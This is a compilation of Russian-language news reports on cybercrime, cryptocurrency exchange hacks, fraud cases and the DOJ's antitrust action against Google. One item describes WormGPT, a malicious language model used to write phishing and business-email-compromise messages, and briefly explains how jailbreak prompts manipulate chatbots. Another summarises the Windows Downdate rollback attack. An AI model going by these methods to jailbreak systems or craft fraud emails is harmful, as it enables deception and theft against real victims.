В настоящее время Poloniex сообщила, что близка к завершению необходимых шагов для восстановления операционной функциональности и возобновления своей обычной торговой деятельности. Биржа также инициировала строгий аудит безопасности для улучшения защиты от угроз. 15 ноября Poloniex сообщила, что аудит находится в процессе. По его завершении биржа ожидает, что сможет с уверенностью продолжить свою деятельность.
source:
x.com/peckshield/status/1725768026660979116?s=20
etherscan.io/idm?addresses=0x4293b5dc11b250078da7359d7d57c15eecfcf70a,0x176f3dab24a159341c0509bb36b833e7fdd0a132&type=1
В среду Министерство юстиции США заявило, что Google должна продать свой браузер Chrome, чтобы разрушить незаконную монополию компании в области онлайн-поиска, говорится в заявлении, поданном в Окружной суд округа Колумбия.
В конечном итоге судья окружного суда Амит Мехта решит, каким будет окончательное наказание Google. Данное решение может существенным образом изменить один из крупнейших в мире бизнесов и структуру интернета, каким он есть сейчас. Ожидается, что этот этап судебного разбирательства начнется в 2025 году.
В августе судья Мехта постановил, что Google является незаконной монополией, поскольку злоупотребляет своей властью над поисковым бизнесом. Судья также не согласился с тем, что Google контролирует различные шлюзы в интернет и выплачивает деньги третьим лицам, чтобы сохранить за собой статус поисковой системы по умолчанию.
В последнем заявлении Минюста говорится, что владение Google операционными системами Android и Chrome, которые являются ключевыми каналами распространения поискового бизнеса, представляет собой «значительную проблему» для применения средств защиты, позволяющих сделать поисковый рынок конкурентоспособным.
Министерство юстиции предложило и другие меры по устранению монополии поискового гиганта, в том числе выделение Google своей мобильной операционной системы Android. В заявлении отмечается, что Google и другие партнеры могут быть против такого выделения, и предлагаются жесткие меры, в том числе запрет на использование Android для создания невыгодных условий для конкурентов на рынке поиска. Минюст намекнул, что если Google не удастся ввести ограничения на Android, то ее следует заставить продать его.
Прокуроры также утверждали, что компании следует запретить заключать исключающие сторонние контракты с компаниями, производящими браузеры или телефоны, как, например, Google заключила контракт с Apple, согласно которому поисковая система должна быть по умолчанию на всех продуктах Apple.
Минюст также утверждал, что Google должна лицензировать свои поисковые данные, а также данные о рекламных кликах конкурентам.
Кроме того, Минюст выдвинул условия, запрещающие Google выходить на рынок браузеров в течение пяти лет после того, как компания выпустит Chrome. Кроме того, после продажи Chrome Google не должна приобретать или владеть какими- либо конкурирующими технологиями текстового поиска, искусственного интеллекта на основе запросов или рекламы. Кроме того, в документе были прописаны положения, согласно которым издатели могут отказаться от использования Google их данных для обучения моделей искусственного интеллекта.
Если суд примет эти меры, Google потерпит серьезное поражение в качестве конкурента OpenAI, Microsoft и Anthropic в области технологий искусственного интеллекта.
Ответ Google:
В ответ Google заявила, что последняя заявка Минюста является «радикальной
интервенционистской программой», которая нанесет ущерб жителям США и
технологическому превосходству страны в мире.
«Предложение Минюста выходит за рамки решения суда. Оно нарушит целый ряд продуктов Google - даже помимо поиска - которые люди любят и считают полезными в своей повседневной жизни», - заявил президент по глобальным вопросам и главный юрист Google Кент Уокер [в своем блоге.](https://blog.google/outreach- initiatives/public-policy/doj-search-remedies-nov-2024/)
Уокер привел дополнительные аргументы в пользу того, что предложение поставит под угрозу безопасность и конфиденциальность пользователей, ухудшит качество Chrome и Android, а также навредит таким сервисам, как Mozilla Firefox, который зависит от Google Search.
Он добавил, что если предложение пройдет, то это затруднит людям доступ к Google Search. Кроме того, это повредит перспективам компании в гонке за ИИ.
«Подход Минюста приведет к беспрецедентному превышению полномочий правительства, что нанесет ущерб американским потребителям, разработчикам и малому бизнесу, а также поставит под угрозу глобальное экономическое и технологическое лидерство Америки именно в тот момент, когда оно больше всего необходимо», - сказал он.
Компания должна представить свой ответ на это заявление в следующем месяце.
source: <https://techcrunch.com/2024/11/20/doj-google-must-sell-chrome-to-end- monopoly/>
Хакер получал доступ к личным кабинетам пользователей от интернет-сервисов.
Следователи ФСБ возбудили два уголовного дела в отношении челябинца, который взламывал личные кабинеты пользователей и перепродавал полученные данные. Его обвиняют в неправомерном доступе к компьютерной информации и использовании вредоносных программ.
— С использованием программного обеспечения, заведомо предназначенного для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации, он незаконно получал доступ к личным кабинетам от интернет-сервисов, в том числе госучреждений, банковских систем, и распространял их за вознаграждение в мессенджере Telegram, — сообщили в среду, 20 сентября, в пресс-службе УФСБ по Челябинской области.
Задержанному 20 лет. Официально он нигде не работал, но получал доход от продажи личных данных. Взломать он успел около тысячи идентификаторов.
Часть 1 статьи 272 (неправомерный доступ к компьютерной информации) предусматривает различные варианты наказания — от штрафа до 2 лет лишения свободы. По части 2 статьи 273 УК РФ (создание, использование и распространение вредоносных компьютерных программ) — от ограничения свободы до 5 лет лишения.
С июня 2023 г. группа Lazarus Group, связанная с Северной Кореей, похитила криптовалюты на сумму около 240 млн долларов США, что свидетельствует о значительной эскалации взломов.
Согласно многочисленным сообщениям Certik, Elliptic и ZachXBT, печально известная хакерская группа подозревается в краже цифровых активов на сумму 31 млн. долл. с биржи CoinEx 12 сентября 2023 года.
Криптовалютная кража, направленная на CoinEx, дополняет череду недавних атак,
направленных на Atomic Wallet (100 млн. долл.), CoinsPaid (37,3 млн. долл.),
Alphapo (60 млн. долл.) и Stake.com (41 млн. долл.).
"Часть средств, похищенных с CoinEx, была отправлена на адрес, который
использовался группой Lazarus для отмывания средств, похищенных с сайта
Stake.com, хотя и на другом блокчейне", - говорится в сообщении Elliptic.
"После этого средства были переведены в Ethereum с помощью моста, ранее
использовавшегося Lazarus, а затем отправлены обратно на адрес, который, как
известно, контролировался хакером CoinEx".
По мнению аналитической компании, специализирующейся на блокчейн-аналитике, последние атаки свидетельствуют о том, что враждебный коллектив смещает акцент с децентрализованных сервисов на централизованные, которые были его целью до 2020 года.
Вероятно, этот поворот вызван улучшением стандартов аудита и разработки смарт-
контрактов в пространстве DeFi и расширением доступа к централизованным биржам
с помощью атак социальной инженерии.
Это событие произошло в тот момент, когда лидер страны, находящейся под
санкциями, Ким Чен Ын посетил Россию для заключения, как предполагается,
сделки по продаже оружия, хотя в начале недели он запустил две баллистические
ракеты малой дальности в сторону своих восточных морей.
Северная Корея использует кражу криптовалюты как способ обхода санкций и финансирования своих программ вооружений. Другим каналом получения доходов является использование внештатных ИТ-работников за рубежом с поддельными документами, скрывающими их истинное гражданство.
"В последние годы заметно увеличились масштабы кибератак на криптовалютные предприятия со стороны Северной Кореи", - заявила TRM Labs в июне 2023 года. "Это совпало с очевидным ускорением ядерной и баллистической ракетной программ страны".
Группа Lazarus и ее подгруппы, а также другие хакерские группировки, связанные с этой страной, в последние месяцы не прекращают свою деятельность, организуя различные вредоносные операции, включая атаки на цепочки поставок программного обеспечения, направленные на такие компании, как 3CX и JumpCloud, а также на репозитории с открытым исходным кодом JavaScript и Python.
В своем анализе взлома компания CoinsPaid сообщила, что фальшивые рекрутеры из криптовалютных компаний связывались с ее сотрудниками через LinkedIn и различные мессенджеры, предлагая высокую зарплату и убеждая их "установить JumpCloud Agent или специальную программу для выполнения технического задания" - эта кампания получила название Operation Dream Job.
source:<https://thehackernews.com/2023/09/north-koreas-lazarus-group- suspected-in.html>
Специалисты [SlashNext ](https://slashnext.com/blog/wormgpt-the-generative-ai- tool-cybercriminals-are-using-to-launch-business-email-compromise- attacks/)обратили внимание, что киберпреступники все чаще используют генеративный ИИ в своих атаках. В частности, на хакерских форумах рекламируется инструмент WormGPT, который предлагается применять для организации фишинговых рассылок и компрометации деловой почты (Business Email Compromise, BEC).
[](https://xakep.ru/wp- content/uploads/2023/07/429845/WormGPT.jpg)Реклама WormGPT
«Этот инструмент представляет собой blackhat-альтернативу известным моделям GPT, разработанную специально для вредоносных действий, — пишут исследователи. —Киберпреступники могут использовать эту технологию для автоматизированного создания очень убедительных фейковых писем, персонализированных для получателя, что увеличивает шансы на успех атаки».
Click to expand...
WormGPT основан на языковой модели GPTJ, созданной в 2021 году. Он может похвастаться рядом функций, включая неограниченную поддержку символов, сохранение истории чатов и возможность форматирования кода. Авторы называют его «злейшим врагом ChatGPT», который позволяет совершать «всевозможные незаконные действия».
Также создатели инструмента утверждают, что он обучен на разных наборах данных, с упором на данные, связанные с вредоносными программами. Однако конкретные наборы данных, использованные в процессе обучения, не раскрываются.
[](https://xakep.ru/wp-
content/uploads/2023/07/429845/WormGPT-Data-Sourc.jpg)Об обучении WormGPT
Получив доступ к WormGPT, эксперты провели собственные тесты. Так, в одном
эксперименте они поручили WormGPT сгенерировать мошенническое письмо, которое
должно вынудить ничего не подозревающего менеджера по работе с клиентами
оплатить мошеннический счет.
В SlashNext говорят, что результаты оказались «тревожными»: WormGPT создал письмо, которое получилось не только убедительным, но и весьма хитрым, что «демонстрирует потенциал для использования в изощренных фишинговых и BEC- атаках».
[](https://xakep.ru/wp- content/uploads/2023/07/429845/WormGPT-Created-BEC-Attack.jpg)Созданное исследователями фишинговое письмо
«Генеративный ИИ может создавать электронные письма с безупречной грамматикой, повышая их [внешнюю] легитимность и снижая вероятность того, что они будут помечены как подозрительные, — пишут специалисты. — Использование генеративного ИИ значительно упрощает выполнение сложных BEC- атак. Даже злоумышленники с ограниченными навыками могут использовать эту технологию, что делает ее доступным инструментом для очень широкого круга киберпреступников».
Click to expand...
Также исследователи отмечают тенденцию, о которой еще в начале года предупреждали их коллеги из компании [Check Point](https://blog.checkpoint.com/2023/03/15/check-point-research-conducts- initial-security-analysis-of-chatgpt4-highlighting-potential-scenarios-for- accelerated-cybercrime/): на хакерских форумах по-прежнему активно обсуждаются «джейлбрейки» для ИИ типа ChatGPT.
Обычно такие «джейлбрейки» представляют собой тщательно продуманные запросы, составленные особым образом. Они предназначены для манипулирования ИИ чат- ботами, с целью генерации ответов, которые могут содержать конфиденциальную информацию, нежелательный контент и даже вредоносный код.
[](https://xakep.ru/wp- content/uploads/2023/07/429845/Hackers-Forum.jpg)
Правоохранительным органам Иркутска удалось задержать группу лиц, которые, по данным полиции, предлагали продажу и размещение майнингового оборудования, но затем скрылись с 12 млн рублей.
В декабре 2021 года 16 жителей Иркутска обратились в дежурную часть Межмуниципального управления МВД России «Иркутское». Пострадавшие рассказали, что пытались приобрести майнинговое оборудование и заключить договор об аренде помещений для добычи криптовалют.
Офис компании располагался на улице Байкальской в Иркутске. Двое «сотрудников» фирмы собрали средства, но оборудование так и не поставили, а затем и вовсе скрылись с деньгами. Некоторые клиенты предоставили собственное оборудование для установки в «майнинг-отеле», но оно также пропало.
Проведя расследование, полицейские установили, что мошенники уже покинули Иркутскую область. Однако, удалось установить куда они направились, и двоих из подозреваемых задержали в Тюмени. Чуть позднее еще трех предполагаемых участников преступной группы задержали в Челябинской области.
Всего от действий мошеннической группы пострадали 68 граждан по всей стране. В список жертв попали жители Москвы, а также Московской, Иркутской и Новосибирской областей, Республики Хакасия и Красноярского края. Общий ущерб составил свыше 12 млн рублей.
Прокуратура уже утвердила обвинительное заключение по части 4 статьи 159 Уголовного кодекса Российской Федерации (мошенничество, совершенное организованной группой в особо крупном размере). Дело будет рассмотрено в Октябрьском суде города Иркутска. Подозреваемым грозит до 10 лет лишения свободы.
source: мвд.рф/news/item/25012789
Прокуратура Могилевской области направила в суд уголовное дело в отношении 23-летнего жителя Брестской области. Молодому человеку инкриминировано пособничество в покушениях на хищение путем модификации компьютерной информации и мошенничество в особо крупном размере.
Мужчина установил через интернет связь с лицами, которые путем обмана с помощью методов социальной инженерии похищали деньги граждан. Согласившись за процент от похищенного оказать содействие, молодой человек передал им реквизиты банковских счетов, к которым он имел доступ, для указания получателя переводов похищенных средств.
Злоумышленники использовали эту информацию в противоправных целях. Звонили потерпевшим, представлялись банковскими служащими, сообщали гражданам о попытках списания с их счетов денег. Затем предлагали сообщить им конфиденциальные сведения, которые содержались в вопросах из SMS-сообщений. Узнав необходимые данные, они получали доступ к управлению средствами на счете и похищали их.
В других эпизодах злоумышленники представлялись сотрудниками банков, органов внутренних дел, следователями, после чего сообщали гражданам, что на их имя в банке оформлен кредит. Когда потерпевшие верили, они предлагали предотвратить хищение через оформление реального кредита. При этом объясняли, что это необходимо для выявления недобросовестных сотрудников банка и возврата денег. Впоследствии потерпевшим передавали реквизиты счетов, на которые необходимо было перевести деньги, полученные в кредит.
Действуя по схеме, житель Брестской области переводил похищенные деньги на подконтрольные счета соучастников преступления, обналичивал их в банкоматах, после чего перечислял им их долю.
Всего через счета, представленные обвиняемым, с октября 2021 года по февраль 2022-го прошло свыше Br96 тыс., похищенных с использованием реквизитов банковских карт потерпевших, а также более Br83 тыс., похищенных путем обмана, когда злоумышленники вынуждали потерпевших оформлять кредиты в банках.
По уголовному делу установлено 44 потерпевших, проживающих по всей стране.
После изучения материалов дела в прокуратуре Могилевской области пришли к выводу об обоснованности обвинения, полном и объективном исследовании обстоятельств преступлений. Согласились с квалификацией содеянного по по ч.6 ст.16, ч.1 ст.14 и ч.4 ст.212, ч.6 ст.16, ч.1 ст.14 и ч.4 ст.209 УК. Уголовное дело находилось в производстве управления Следственного комитета по Могилевской области.
Ранее избранную в отношении жителя Брестской области меру пресечения в виде заключения под стражу прокурор, направляя дело в суд, оставил без изменения.
**Nvidia расследует возможную кибератаку
В результате инцидента некоторые системы компании были отключены на два дня.**
Крупный американский производитель процессоров Nvidia расследует возможный инцидент безопасности, в результате которого некоторые системы компании были отключены на два дня.
Вероятная кибератака затронула инструменты разработчиков и системы электронной почты. Сбой в работе был вызван проникновением в сеть, но были ли похищены корпоративные или клиентские данные, пока неизвестно.
В настоящее время проводится оценка масштабов и влияния инцидента. По словам компании, ее коммерческие активы не пострадали.
Никаких дополнительных данных Nvidia пока предоставить не может, однако, как сообщил порталу BleepingComputer один из сотрудников компании, инцидент «полностью скомпрометировал» ее внутренние системы. Вероятно, причиной атаки яыляется вымогательское ПО, пишет Bloomberg.
Nvidia, чья рыночная стоимость составляет почти $600 млрд, является самым дорогостоящим производителем чипов в США. В частности, компания известна своими мощными видеокартами для игровых компьютеров.
Сингапурская криптобиржа Bitrue подтвердила факт хакерской атаки, в результате которой злоумышленнику удалось вывести активы примерно на $23 млн.
2/4: The attackers were able to withdraw assets worth approximately 23M USD in ETH, QNT, GALA, SHIB, HOT and MATIC. The affected hot wallet only holds less than 5% of our overall funds. The rest of our wallets remain secure and have not been compromised.
— Bitrue (@BitrueOfficial) April 14, 2023Click to expand...
Неизвестный вывел средства в ETH, QNT, GALA, SHIB, HOT и MATIC.
«Скомпрометированный кошелек содержит менее 5% наших общих средств. Остальные остаются в безопасности и не подверглись взлому», — уточнила команда.
В Bitrue сообщили о проведении проверки безопасности и приостановке операций по выводу средств. Функцию обещали перезапустить 18 апреля.
«Все идентифицированные пользователи, затронутые этим инцидентом, получат компенсацию в полном объеме», — добавили представители биржи.
Согласно Arkham, ущерб от хакерской атаки составил $24,2 млн. Эксперты отметили, что активы хранятся по адресу, начинающемуся с «0x181». Неизвестный обменял средства на 8858 ETH, но сохранил большую часть в SHIB и HOT.
Bitrue @BitrueOfficial has been exploited this morning for around $24.2M worth of tokens, mainly in QNT, GALA and SHIB.
The tokens currently reside in 0x181, having been swapped to 8.858K Ether.
Interestingly, the hacker has kept most of the SHIB and HOT.
Stay safe! https://t.co/SorQHYpWZf pic.twitter.com/5Otj45uwlE
— Arkham (@ArkhamIntel) April 14, 2023Click to expand...
Правоохранительными органами китайского города Цзуньи задержано 130 человек. Им вменяют в вину организацию масштабной схемы отмывания денег через криптовалюты на сумму свыше $130 млн.
Операция «сломанная карта» была запущена отделением по борьбе с мошенничеством полиции города Цзуньи в июле 2021 года. Впоследствии была организована специальная рабочая группа по борьбе с преступной ячейкой. После двух месяцев расследования и сбора улик было арестовано около 100 подозреваемых в отмывании денег. Также полиция конфисковала 51 мобильный телефон, 15 компьютеров и 511 банковскую карту.
По данным полиции, участники преступной группы совершили как минимум 332 случая отмывания средств. В своей деятельности они активно использовали цифровые активы, причем деньги отмывались через крупнейшие криптовалютные биржи ― Binance, OKEx и Huobi.
Полиция отметила, что преступники долгое время оставались незамеченными правоохранительными органами и банковскими службами безопасности. Этому способствовало использование криптовалют, дробление крупных сумм на небольшие переводы и использование множества банковских карт.
Контрмеры США включали попытку перекрыть хакерам источники финансирования.
Кибернетическое командование США (United States Cyber Command) публично признало проведение наступательных действий с целью нейтрализовать киберпреступные группировки, атаковавшие американские компании с помощью программ-вымогателей.
Представитель Киберкомандования США в интервью каналу CNN отказался уточнить, какие именно действия предприняла команда экспертов. Компьютерные оперативники американских вооруженных сил все более охотно взламывают преступников, а не только государственных деятелей, представляющих угрозу критической инфраструктуре США. Но это одно из первых недвусмысленных подтверждений Киберкомандования, что ведомство нацелено на преступные группировки, которые держат компьютерные системы американских предприятий «в заложниках».
Органы безопасности правительства США начали активно преследовать вымогательские группировки после того, как в начале нынешнего года злоумышленники взломали сети топливного гиганта Colonial Pipeline и крупнейшего в мире производителя мяса JBS.
Как сообщил глава Киберкомандования США и Агентства Национальной Безопасности Пол Накасоне (Paul Nakasone), правительство США провело наступательные действия против операторов программ-вымогателей, в том числе попытавшись перекрыть хакерам источники финансирования.
Контрнаступление правительства США против группировок программ-вымогателей, многие из которых базируются в Восточной Европе и России, также включает предъявление обвинений предполагаемым вымогателям и санкционирование криптовалютных бирж, обвиняемых в отмывании денег для хакеров.
Однако не только правительство США решило применить более агрессивные меры против вымогателей. Центр правительственной связи Великобритании сообщил о планах использовать сформированные в прошлом году национальные киберсилы для взлома и преследования вымогательских группировок. Хотя подробности подобных операций, как правило, держатся в секрете, они обычно включают блокировку сигналов телефонов преступников или вмешательство в работу их серверов, отмечает Financial Times.
Исследователь Алон Левиев из SafeBreach на конференции Black Hat 2024 [выкатил две 0-day](https://www.safebreach.com/blog/downgrade-attacks-using-windows- updates/), которые могут быть использованы в атаках, реализующих откат критических исправлений в Windows 10, Windows 11 и Windows Server.
В результате таких атак злоумышленники заставляют обновленное целевое устройство откатываться к более старым версиям ПО, что вновь открывает уже исправленные уязвимости, которые можно использовать для взлома систем.
Причем процесс обновления Windows может быть скомпрометирован для понижения версий именно критических компонентов ОС, включая динамические библиотеки (DLL) и ядро NT.
При этом при проверке Центром обновления Windows ОС все заниженные компоненты будут отображаться в актуальном состоянии, а сканирование не приведет к обнаружению каких-либо проблем.
Используя [CVE-2024-38202](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2024-38202) и [CVE-2024-21302](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2024-21302), исследователь также смог понизить уровень защищенного ядра Credential Guard и изолированного процесса пользовательского режима, а также гипервизора Hyper-V, вернув прошлые уязвимости повышения привилегий.
Он представил несколько способов отключения безопасности на основе виртуализации Windows (VBS), включая такие функции, как Credential Guard и Hypervisor-Protected Code integrity (HVCI), даже если они усилены блокировками UEFI, впервые добившись обхода блокировок UEFI VBS без физического доступа.
По результатам удалось сформировать полностью пропатченную машину Windows уязвимой для тысяч прошлых уязвимостей, превратив все исправленные уязвимости в рабочие нули, обнулив тем самым термин «полностью пропатченная».
Сама атака на понижениея версии фактически не обнаруживается, поскольку ее нельзя заблокировать с помощью решений EDR, а также она невидима, поскольку Центр обновления Windows сообщает, что устройство полностью обновлено (несмотря на понижение версии).
С момента того, как исследователь представил атаку Windows Downdate еще в феврале в Microsoft, разработчики до сих пор не смогли ее исправить, выпустив лишь рекомендации по смягчению последствий Windows Update Stack Elevation of Privilege и Windows Secure Kernel Mode Elevation of Privilege.
Как поясняет компания, уязвимость повышения привилегий CVE-2024-38202 Windows Backup позволяет злоумышленникам с базовыми правами пользователя «отменять исправления» ранее устраненных ошибок безопасности или обходить функции VBS.
Злоумышленники с правами администратора могут использовать уязвимость повышения привилегий CVE-2024-21302 для замены системных файлов Windows устаревшими и уязвимыми версиями.
Microsoft заявила, что в настоящее время ей неизвестно о попытках эксплуатации этой уязвимости в реальных условиях, и рекомендовала реализовать рекомендации, изложенные в двух опубликованных сегодня рекомендациях.
Компания активно работает над исправлением нулей, включая и обновления, которые отменят устаревшие, неисправленные системные файлы VBS для смягчения атаки.
Исследователь считает, что последствия будут существенными не только для Microsoft Windows, но и для других поставщиков ОС, которые потенциально могут быть подвержены атакам с целью понижения версии.
• Source: [http://www.blackhat.com/us-24/brief...downgrade-attacks-using- windows- updates-38963](http://www.blackhat.com/us-24/briefings/schedule/index.html#windows- downdate-downgrade-attacks-using-windows-updates-38963)
• Source: [https://i.blackhat.com/BH-US-24/Pre...e-Attacks-Using-Windows- Updates-Wednesday.pdf](https://i.blackhat.com/BH- US-24/Presentations/US24-Leviev-Windows-Downdate-Downgrade-Attacks-Using- Windows-Updates-Wednesday.pdf)
Разработчики Telegram-игры Super Sushi Samurai сообщили, что эксплуатация ошибки в смарт-контракте позволила хакеру вывести $4,6 млн с LP-кошельков.
__https://twitter.com/x/status/1770836683426062397
Разработчик Yuga Labs под ником Coffee заявил, что это была атака двойного расходования. При отправке пользователем баланса кошелька самому себе это удваивало средства.
__https://twitter.com/x/status/1770834359601217886
Взломщик приобрел 690 млн токенов SSS и 25 раз перевел весь баланс себе, удваивая его. Затем он продал «добытые» таким образом 11,5 трлн SSS за 1310 ETH (~$4,6 млн) на децентрализованных биржах.
Позднее хакер связался с командой проекта через подпись в транзакции и предложил возместить средства. На момент написания стороны ведут переговоры.
На фоне инцидента цена токена SSS рухнула на 99,9% согласно CoinGecko.
Telegram-игра Super Sushi Samurai работает в сети Blast. Вознаграждения генерируются за счет комбинации торгового налога, скидки на комиссию за транзакции в цепочке от Blast и дохода, полученного от эфира в пуле LP.
Напомним, Blast представляет собой EVM-совместимый протокол для масштабирования, в котором задействованы Optimistic Rollups. Платформа предлагает пассивный доход в 4-5% годовых.
Проект запущен в ноябре 2023 года основателем NFT-маркетплейса Blur под псевдонимом Pacman. Изначально протокол не имел даже тестовой сети и предлагал пользователям депонировать монеты через мост.
️
QIWI — ВСЁ.
Центробанк отозвал лицензию на осуществление банковских операций у QIWI Банка.
Банк России приказом от 21.02.2024 № ОД-266 отозвал лицензию на осуществление банковских операций у кредитной организации КИВИ Банк (акционерное общество) КИВИ Банк (АО) (рег. № 2241, город Москва). По величине активов кредитная организация занимала 89 место в банковской системе Российской Федерации.
Банк России принял такое решение в соответствии с пунктами 6 и 6.1 части первой статьи 20 Федерального закона «О банках и банковской деятельности», руководствуясь тем, что Банк:
Приказом Банка России от 21.02.2024 № ОД-267 в кредитную организацию назначена временная администрация, функции которой возложены на государственную корпорацию «Агентство по страхованию вкладов». Временная администрация будет действовать до момента назначения конкурсного управляющего либо ликвидатора. Полномочия исполнительных органов кредитной организации в соответствии с федеральными законами приостановлены.
Суммы вкладов будут возвращены вкладчикам в размере 100% остатка средств, но не более 1,4 млн рублей.
Акции Qiwi упали с открытия -23% на фоне новости о лишении Киви-банка лицензии.
Кроме этого, Платежная система Contact (входит в группу Qiwi) не работает
после отзыва лицензии у Киви банка.
Офицер Австралийской федеральной полиции Уильям Уитли предстал перед судом по обвинению в краже 81,616 BTC, изъятых в ходе расследования дела о продаже наркотиков за криптовалюты в 2019 году.
Уильям Уитли (William Wheatley) предстал перед мировым судом Мельбурна, не признав вину в злоупотреблении информацией, которую он получил в качестве госслужащего. Адвокат Уитли — Люк Баркер (Luke Barker) — заявил, что доказательства против его подзащитного являются косвенными, и что он будет оспаривать предъявленные обвинения.
Ранее оперативная группа Icarus, совместно с полицией штата Виктория и Федеральной полицией Австралии (AFP), провели обыски у людей, подозреваемых в торговле стероидами. В ходе рейда было обнаружено, что преступники использовали зашифрованные сообщения для реализации наркотиков, а оплату за запрещенные вещества они получали в биткоинах. Во время обысков следователи также обнаружили аппаратный кошелек Trezor, который был передан опергруппе Icarus.
Получив разрешение мирового судьи на доступ к кошельку, где хранились 81,616 BTC, следователи Icarus обнаружили, что все криптоактивы были перемещены из кошелька всего через четыре дня после конфискации устройства. На момент рейда изъятые биткоины оценивались примерно в $450 000, а сейчас их стоимость составляет более $6 млн.
Изначально предполагалось, что биткоины были украдены сообщниками наркоторговцев, однако позже выяснилось, что к исчезновению конфискованной криптовалюты причастен сотрудник полиции. Благодаря новым инструментам, которые помогли выявить «нечестную игру» со стороны сотрудника правоохранительных органов, в 2021 году дело было возобновлено.
Следователи нашли связь IP-адресов со штаб-квартирой Австралийской федеральной полицией в Мельбурне. В период с 29 января по 11 апреля 2019 года на различных криптоплатформах было совершено 28 транзакций, в которых участвовал адрес, куда ранее были отправлены конфискованные цифровые активы. В сентябре 2022 года часть средств была выведена на личный банковский счет Уитли, который принимал непосредственное участие в обыске.
Напомним, что в прошлом году в России произошла похожая ситуация — бывший сотрудник ФСБ Максим Жижкун получил пять лет тюрьмы за кражу 68 биткоинов у находящегося под следствием хакера. В сентябре в Москве были задержаны двое московских полицейских после кражи 10 биткоинов на 26 млн рублей.
38-летний Миклос Дэниел Броуди, инженер облачных сервисов (Cloud-инженер), был приговорен к 2 годам тюремного заключения и выплате компенсации в размере $529 000 за уничтожение репозиториев кода своего бывшего работодателя в отместку за увольнение из компании.
First Republic Bank был коммерческим банком в США, в котором работало более 7 000 человек, а годовой доход составлял $6,75 млрд. Банк закрылся 1 мая 2023 года и был продан JPMorgan Chase.
По данным Министерства юстиции США, Броуди был уволен 11 марта 2020 года из банка First Republic Bank (FRB) в Сан-Франциско, где он работал Cloud- инженером. В судебных документах говорится, что Броуди был уволен с работы после того, как он нарушил политику компании, подключив USB-накопитель с порнографией к компьютерам компании.
После увольнения Броуди якобы отказался вернуть свой рабочий ноутбук и вместо этого использовал свою все еще действующую учетную запись для доступа к компьютерной сети банка и причинения ущерба, который оценивается в более чем $220 000.
До прекращения доступа к сети FRB 12 марта Броуди выполнил следующие действия:
удалил репозитории кодов банка;
запустил вредоносный скрипт для уничтожения серверов FRB;
запустил вредоносный сценарий для удаления журналов;
оставил комментарии в коде банка с насмешками в адрес бывших коллег;
выдавал себя за других сотрудников банка, чтобы получить доступ к сети
компании от их имени и внести изменения в конфигурацию;
отправил на свою электронную почту собственный код, над которым он работал в
качестве сотрудника, и который был оценен в более чем $5 000.
После инцидента Броуди ложно сообщил в полицейское управление Сан-Франциско,
что из его машины украли ноутбук, выданный FRB. Он продолжал поддерживать эту
версию, когда давал показания агентам Секретной службы США (United States
Secret Service, USSS) после его ареста в марте 2021 года.
В конце концов, в апреле 2023 года Броуди признал себя виновным в обмане с историей о ноутбуке и по двум обвинениям в нарушении закона о компьютерном мошенничестве и злоупотреблениях (Computer Fraud and Abuse Act). Помимо 2-ухлетнего тюремного заключения и выплаты компенсации, Броуди назначено 3 года освобождения под надзором (Supervised Release).
source:
justice[.]gov/usao-ndca/pr/disgruntled-cloud-engineer-sentenced-two-years-
prison-intentionally-damaging-his
documentcloud.org/documents/24215622-united-states-v-
brody?responsive=1&title=1
Чтобы та сняла с неё порчу. Онлайн-ведунья из Подмосковья развела наивную женщину более, чем на ₽2 млн.
По информации SHOT, 40-летней Елене из Омска в запрещённой инсте написала потомственная ведьма/колдунья Розанна, которая сообщила, что у женщины очень много негативной энергии в ауре, порча и ещё куча всякой гадости, от которой необходимо срочно избавляться.
Перепуганная дама выразила решительную готовность делать всё, что нужно для очищения. Первым делом колдунья велела Елене отправить ей все золотые украшения, которые у неё есть: мол, золото это мрачный негативный металл и пока он рядом, почистить ауру не получится.
Ювелирки у Елены набралось аж 6 кг — на ₽2,1 млн. Всё это богатство она отправила Розанне, на указанный адрес — в подмосковный город Щёлково. Как только Елена рассталась с "мрачным металлом", ведьма заявила ей, что карма почистилась автоматически, и никакие обряды больше не нужны.
Елена поняла, что её развели, и стала требовать своё золото назад. Розанна заявила, что вернёт украшения, если просветлённая жительница Омска заплатит ей ₽430 тысяч. Та согласилась, но попросила ювелирку вперёд.
Ведунья выслала лишь 1 кг украшений. По трек-номеру Елена узнала, что Розанна делала отправление из подмосковных Мытищ, и пошла с этой инфой в полицию. Но в возбуждении дела ей отказали: местные сотрудники не увидели в произошедшем состава преступления.
Департамент полиции Лос-Анджелеса (штат Калифорния) объявил об аресте 13 выходцев из Румынии, которые похищали данные банковских карточек американцев с помощью скиммеров. Журналисты KTLA 5 уточняют, что речь идет о выплатах в рамках программы SNAP, которые малообеспеченные жители южных округов штата получали на карточки EBT.
В сообщении местной полиции также отмечается, что сведения о компактном проживании членов группировки силовики получили 25 апреля 2023 года. Все они находились в одном мотеле, который стал для них своеобразной базой. При обыске у граждан Румынии нашли скиммеры, большое количество поддельных удостоверений личности и других документов, а также около 36 тысяч долларов наличными.
Следователи полагают, что подозреваемые могут быть частью крупного румынского синдиката кардеров, который развил небывалую активность после начала выплат в США пособий в рамках борьбы с коронавирусом и других программ. Расследование продолжается и пока точных данных о заработанных кардерами суммах нет, однако местные власти полагают, что речь может идти о ежемесячной прибыли в миллионы долларов. Отмечается также, что в марте 2023 года были арестованы другие 15 граждан Румынии, которые также могли входить в синдикат. Их обвиняют в краже 38 миллионов долларов, а работали они также преимущественно в Южной Калифорнии.
• Source: [https://ktla.com/news/local-news/13...llions-from-low-income- southern-californians/](https://ktla.com/news/local-news/13-arrested-for- stealing-millions-from-low-income-southern-californians/)
При аресте Ивара Аузиньша в Латвии у него конфисковали два эксклюзивных автомобиля и 100 000 евро наличными. В пятницу - 29 июля, Верховный суд (ВС) принял решение разрешить экстрадицию этого гражданина Латвии в США для уголовного преследования.
Вместе со своими сообщниками он подозревается в похищении 7 миллионов долларов (но, возможно, и больше).
Госполиция Латвии, не раскрывая имени лица, ранее сообщила, что подозреваемый вместе с сообщниками совершал мошеннические действия, создав фальшивые инвестиционные площадки, куда привлекали деньги американцев.
После ареста в Латвии, который произошел 1 декабря 2021 года, Аузиньша собирались экстрадировать в США. Однако задержанный обжаловал это решение в суде, считая, что его должны судить в Латвии. Но судебный процесс проиграл.
Что ему вменяется
Комиссия по ценным бумагам и биржам США (SEC) выдвинула обвинения в адрес этого гражданина Латвии в причастности к организации нескольких мошеннических схем, связанных с криптовалютами, - сообщает Bits.media со ссылкой на SEC.
